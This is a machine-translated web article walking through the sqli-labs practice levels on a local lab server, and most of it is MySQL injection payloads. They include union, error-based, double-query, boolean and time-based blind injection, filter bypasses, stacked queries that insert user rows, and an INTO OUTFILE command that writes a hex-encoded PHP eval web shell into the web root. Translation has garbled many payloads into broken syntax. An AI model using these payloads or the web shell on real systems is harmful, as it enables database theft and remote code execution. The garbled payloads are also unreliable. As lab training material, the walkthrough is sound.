Shulou(Shulou.com)06/01 Report--

The following content mainly brings you a detailed explanation of how to inject mysql manually. The knowledge mentioned here, which is slightly different from books, is summed up by professional and technical personnel in the process of contact with users, and has a certain value of experience sharing. I hope to bring help to the majority of readers.

Less-1 (normal character type)

Http://127.0.0.1/sql/Less-1/?id=1

Add'to know that it may be character injection

Use and to confirm

It indicates that there is injection.

Number of order by query fields

There are 3 fields

Where the union select query is displayed on the page

Query database

Query table

Look up the field

Check the content

Less2 (normal numerical type)

Digital

Less3 (bracketed character type)

Use'to know that it may be a spliced character injection

Use and to judge

Make sure it is the injection point

Number of order by query fields

Less4 (bracketed double quotation mark character type)

The use of 'and numeric type cannot be judged, nor can the use of% 81, and the use of "discovery may be a double quotation mark injection with parentheses

Use and

Order by

Less5 (double query single quotation marks)

Using'we know that it may be character injection

Use and

Preliminary determination of injection

Order by determines the number of fields

Union select view the location displayed on the page

Failed, double query injection method can be used if the location is not displayed on the page at the time of injection!

Using double queries to inject fixed formulas

Union select 1 from (select count (), concat (floor (rand (0) 2), (injection statement) a from information_schema.tables group by a) b

Query table

Too much to display, use limit query

Http://127.0.0.1/sql/Less-5/?id=1'and ascii (substr ((select table_name from information_schema.tables where table_schema=database () limit 1), 1)) > 113

'or 1 group by concat_ws (0x3b rand (), floor (rand (0) * 2)) having min (0) or' 1

Less6 (double query double quotation marks)

It is impossible to judge using 'and numeric injection, it is impossible to judge with wide bytes, and it is known to be double quotation mark character injection by using "

Use and

Order by

Union select

No display bits are returned, using double query injection

Less7 (double parentheses blind mid,ascii, based on time)

The use of 'and numerical values cannot be judged. According to less2, guess that there may be parentheses.

An attempt was made to change the latter and to a comment and found it failed.

Guess that there may be a parenthesis after the comment.

Try using double parentheses

Use order by

Use union select

No echo, failed to use double query injection

Blind injection using mid function

Judge the length of the database

AND ORD (MID ((IFNULL (CAST (DATABASE () AS CHAR), 0X20)), 9) > 1

Query table

AND ORD (MID ((SELECT IFNULL (CAST (table_name AS CHAR), 0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0pr 1), 1pr 1)) > 1--

LIMIT 0pr 1), 1pr 1

Whether the first table exists or not, query one table at a time

Whether the first character exists or not, query one character at a time.

Query field

AND ORD (MID ((SELECT IFNULL (CAST (column_name AS CHAR), 0x20) FROM INFORMATION_SCHEMA.columnS WHERE table_schema=0x7365637572697479 LIMIT 0, 1), 1)) > 105

Check the content

AND ORD (MID ((SELECT IFNULL (CAST (id AS CHAR), 0x20) FROM emails limit 0, 1), 1)) > 48

Use ascii

')) and (ascii (substr ((select (database (), 8)) > 1) and sleep (5)

Can be used alone

')) and (ascii (substr ((select (database (), 8) > 1)

Less8 (character blind mid)

Using 'and and to know the existence of injection

Order by

Union select does not return display bits

Failed to use double query injection

Use mid

The database has a total of 8 characters

Less9 (time-based blind single quotation marks)

Unable to judge using 'and numeric type, unable to judge with wide bytes, unable to judge with parentheses, using sleep to judge

Try it with O'Neill.

The preliminary judgment is time-based blind injection.

Use and

Use mid

Use ascii

'and (ascii (substr ((select (database (), 9)) > 1) and sleep (5) and' 1

Less10 (time-based blind double quotation marks)

The use of 'and numeric type cannot be judged, the use of wide bytes cannot be judged, the use of parentheses cannot be judged, the use of sleep judgment, and the use of single quotation marks can not be judged by sleep, according to less4 guess may be double quotation marks

Use mid

Less11 (post character type)

Get request header parameters

Post injection

Injection detection of uname

Use'to determine that there may be injection

Use or for further exploration (mainly by using universal statements to judge whether you have successfully logged in or not, if you want to have trouble with and)

Is using and to further inject

Conventional character injection

Use double query

Use mid

Less12 (post parenthesized character type)

It is impossible to judge by using 'and numeric type, not by using wide bytes, and by using double quotation marks to judge that there may be injection, and it is bracketed.

Use or

Order by

Union select

Less13 (double query with parentheses)

Use'to know that it is character type and with parentheses

Use and

Order by

Union select has no display bits returned

Use double query

Union select 1 from (select count (), concat (floor (rand (0) 2), (select database ()) a from information_schema.tables group by a) b

Less14 (double query double quotation marks)

Less15 (time blind injection, mid)

Use 'and or and order by

Union select does not return display bits, double query failed

Try using sleep

Less16 (time blind note, mid, with parentheses)

Less17 (apparent error injection) sqlmap hang

The hint here is to reset the password, which should be to use the update update statement, and to use payload when the usage of insert, update and delete is the same.

Or updatexml (2 concat (0x1, (injection statement)), 0) or'

And extractvalue (1, concat (0x7f, (select version ()), 0x7f))

And 1 = (select from (select NAME_CONST (version (), 1), NAME_CONST (version (), 1)) as x)

Use subquery

'or (SELECT 1 FROM (SELECT count ()), concat ((SELECT (SELECT concat (0x1, cast (database () as char), 0x1)) FROM information_schema.tables limit 0 as char 1), floor (rand (0) * 2) x FROM information_schema.columns group by x) a) or'

Less18 (user-agent error, time, subquery)

Check the page to see that this question injection exists in the http request package (if not prompted, you have to try the login box first)!

Simply using'to judge host and User-Agent, we can know that the injection point may be User-Agent

Use and,or, no further judgment, use sleep to try

Use subquery

'or (SELECT 1 FROM (SELECT count (), concat ((SELECT (SELECT concat (0x1 as char) cast (database () as char) FROM information_schema.tables limit 0 Magi 1), floor (rand (0) 2) x FROM information_schema.columns group by x) a) or'

'or (SELECT 1 FROM (SELECT count (), concat ((SELECT (SELECT concat (0x1 as char), 0x1), floor (rand (0) 2) x FROM information_schema.columns group by x) a) or'

Apparent error injection

'or updatexml (2) concat (0x1, (database ()), 0x1), 0) or'

Less19 (referer error, time, subquery)

There may be injection in the referer field

Use'

Failed to use and or, use sleep

Use subquery

'or (SELECT 1 FROM (SELECT count (), concat ((SELECT (SELECT concat (0x1 as char), 0x1), floor (rand (0) 2) x FROM information_schema.columns group by x) a) or'

Apparent error injection

'or updatexml (2) concat (0x1, (database ()), 0x1), 0) or'

Less20 (cookie injection, double query)

Use'

Use and

Union

Use double query

Less21 (cookie injection, base64 coding)

It is known that cookie is encoded by base64

Use'

Use admin') and 1 # 1--

Use admin') and 1 # 2--

Use order by

Union

Admin') and 1pm 2 union select 1pm 2pm 3

Less22 (cookie injection, base64 encoding, double quotation marks)

The use of 'and numerical, as well as wide bytes can not be judged, the use of "preliminary judgment"

Use and

Use admin "and 1 union select 1 union select 2 meme 3 Murray--

Less23 (apparent error injection, subquery)

Use'

Use and

Failed to use double query

Use error detection injection

Or updatexml (2 concat (0x1, (injection statement)), 0) or'

Use subquery

'and (SELECT 1 FROM (SELECT count (), concat ((SELECT (SELECT concat (0x1 as char), 0x1), floor (rand (0) 2) x FROM information_schema.columns group by x) a) and'

Less24 (secondary injection)

In the login place, no injection is found in the requested place. After logging in, it is found that there is a password reset feature. Consider that it may be a update statement, and obvious error injection can be used. However, when the package is submitted, it is not found that the reset password is the submitted user name. At this point, secondary injection may exist.

The most basic way to make use of this is as follows. It is known that there is an admin account in the system. At this time, we register an admin'-user, log in and change the password. According to the understanding here, it should be to change the password of the admin'-user. In fact, this is not to change the password of the admin account, even if we do not know the original password of admin.

As the database set the length of the user name, too lazy to change, it should be possible to use error injection!

Less25 (character injection, filter once and and or)

Use'

Use and or or

And and or keywords were filtered and failed to use upper and lower case.

Use double nesting to nest an and within an and

You can also use the URL code of & & 26% 26

Use order by

Less25a (numeric, filter once and and or)

It is impossible to judge by using', but it can be judged by numerical value.

Use aandnd 1 # 1

Less26 (character injection, filtering spaces and comments)

Use'

Use and

Filters spaces and comments, as well as the and,or of the previous level, which can be bypassed using nesting or using the URL code of its symbol (& & | |)!

Instead of using spaces and comments, use & & or | | then use error injection

-1% 27% 26% 26 extractvalue (1 recordconcat (0x1 dint database () 26% 26% 26% 1

-1% 27 | | extractvalue (1Magi concat (0x1PowerDB () | | '1minutes resume 1 |

'% 26% 26 updatexml (2 updatexml concat (0x1, (database (), 0)% 26% 26% 1

But if you want to continue to query, you will find that spaces are all needed, so use the encoding of other characters to bypass. Linux uses% 0aPowerWindows% 0a%0d, sometimes% 0a, but my environment is not successful. By comparison, it may be due to problems with my mysql version, so I test according to my own environment, in order to ignore this. So in the next few levels, I comment out all the code that involves filtering spaces, you just need to know that spaces can be replaced by the above code!

Less26a (with parentheses, no mysql error message)

Use'

Use and

Filtered and, comments

In the last screenshot, we know that the data found are still id=1. Here we consider that there may be parentheses.

Try it with parentheses.

Cannot use order by, filter * cannot use subquery, do not display mysql error message, cannot use apparent error injection, use union select to guess

You can also use 2') aandnd 1, union select 1, ('3)

Less27 (error injection, filtering)

Use'

Use and

Filtered comments

For filtered comments, the following 'cannot be annotated, so you can consider using double queries and error injection to try

Use double query

Filtered union select

Use nesting

Filtered * well, you can't use double queries, so go on to use explicit error injection

'and updatexml (2) concat (0x1, (database (), 0) and' 1

Query table, we can see from the above that select using nesting can not be bypassed, so try using case confusion

Less27a (TBD, double quotation marks)

It is impossible to judge by using 'and numeric injection and wide bytes, but by using double quotes.

Use and

Filtered comments

Filtered comments and tried using double query or apparent error injection

Filter *, cannot use double query, do not display mysql error message, cannot use apparent error injection

Use union select to guess

Less28 (filtered union select,ascii fuzzy query)

Use'

Use and

Filtered comments

There may be cases with parentheses

Do not display mysql error messages cannot use apparent error injection, filtered * cannot use double query and subquery

Use union select to guess

Filtering union and select, using nesting failed

Filtered union select and a trailing space (using% a0 to bypass, borrowed figure)

Use ascii

') and (ascii (substr ((sElect (database ()), 1)) > 114) and

Less28a (filter union select)

Same as 28, but you can use comment characters

Use order by

Use union select, same as 28

Use ascii

Less29 (HPP)

Use'

It shows that there is some protection. At this time, we can try to encode, but it is not successful. We use HPP (parameter pollution https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf) to try the next step.

Use'

Use and

Less30 (HPP, double quotes)

Use 'indicates that it is protected, code bypass failed, and use HPP

Use 'and numeric, wide-byte failure, use "

Less31 (HPP, double quotes and parentheses)

Ditto detection

Description in parenthesized double quotation marks

Less32 (wide byte)

Use'

From the above, we can simply see that this level uses wide bytes, but we still follow the above steps. It is impossible to judge by using numerical values, and we can use wide bytes (http://eth20.blog.51cto.com/13143704/1962804) to initially judge that there may be injection.

Use and

Use hexadecimal when querying tables

Less33

Ditto?

Less34 (wide byte, double query)

Using', unable to judge using numeric type, using wide byte

Use or

Use double query

Less35 (numerical)

Failed to use'

Use numerical type

Use order by

Less36

With 32

Less37

The same as 34 years old?

Less38 (stacked query)

With 1, another thing is that you can use; to execute multiple statements.

'; insert into users (id,username,password) values

Less39

Same as 2

Less40

Use'

Use and

Comments cannot be used, or there may be parentheses after the description

Failed to use subquery, failed to show error, and used blind note

Use blind ascii (time-based can be used)

'and (ascii (substr ((select (database (), 8 Magi 1)) > 1) and' 1

'); insert into users (id,username,password) values (' 40th); and ('1century)

Less41

With 39

Less42

User name at will

Password: 1 destroy insert into users (id,username,password) values ('42 minutes and minutes eth20)--

Less43

Password: 1'); insert into users (id,username,password) values

Less44

With 42

Less45

Tong 43

Less46 (injection after order by)

By comparison, we can see that the injection point is the parameter after order by.

Use desc for comparison

Use error report

(select count () from information_schema.columns group by concat (0x1, (database ()), 0x1 limit () 2))

The following is still applicable to post-limit injections

Export files, write horses

Sort=1 into outfile "F:\ phpStudy\ WWW\ sql\ Less-40\ eth20.php" lines terminated by 0x203C3F70687020406576616C28245F504F53545B226574683130225D293B3F3E

Use blind injection

1 and If (ascii (substr (database (), 1Mague 1)) = 114recover0st sleep (5)-- +

Less47

Through 46, it's just character type.

'procedure analyse (extractvalue (rand (), concat (0x1)), 1)

'and (updatexml (2 concat (0x1, (database ()), 0))

Use delay injection to inject 1 'and If (ascii (substr (database (), 1Magne1)) = 114 ~ 0 ~ 0 ~ sleep (5)-- +

Less48

With 46, can not use error can be used blind note

Use rand

Rand (ascii (left (database (), 1)) = 116)

Less49

Same as 47, no error echo

Delayed blind injection

1 'and (If (ascii (substr (database ()), 1) (1) = 114 (0) sleep (5))--

For the above detailed explanation on how to inject mysql manually, if you have more information, you can continue to pay attention to the innovation of our industry. If you need professional answers, you can contact the pre-sale and after-sale ones on the official website. I hope this article can bring you some knowledge updates.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.